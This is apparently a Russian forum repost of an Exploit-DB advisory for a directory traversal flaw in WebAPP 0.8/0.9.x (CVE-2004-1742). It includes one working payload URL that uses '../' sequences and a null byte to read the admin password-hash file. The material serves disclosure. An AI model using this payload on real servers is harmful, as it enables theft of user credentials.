Exploit Web-APP.Org WebAPP 0.8/0.9.x - Directory Traversal

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
24408
Проверка EDB
  1. Пройдено
Автор
JEROME ATHIAS
Тип уязвимости
WEBAPPS
Платформа
CGI
CVE
cve-2004-1742
Дата публикации
2004-08-24
Web-APP.Org WebAPP 0.8/0.9.x - Directory Traversal
Код:
source: https://www.securityfocus.com/bid/11028/info

WebAPP is reported prone to a directory-traversal vulnerability because the application fails to properly sanitize user-supplied input data.

An attacker can exploit this vulnerability to retrieve arbitrary, potentially sensitive files from the hosting computer with the privileges of the webserver. gthe attacker could trivially retrieve DES-encrypted password hashes for all users of the application. This may aid the attacker in further attacks. 

http://www.example.com/cgi-bin/index.cgi?action=topics&viewcat=../../db/members/admin.dat%00
 
Источник
www.exploit-db.com

Похожие темы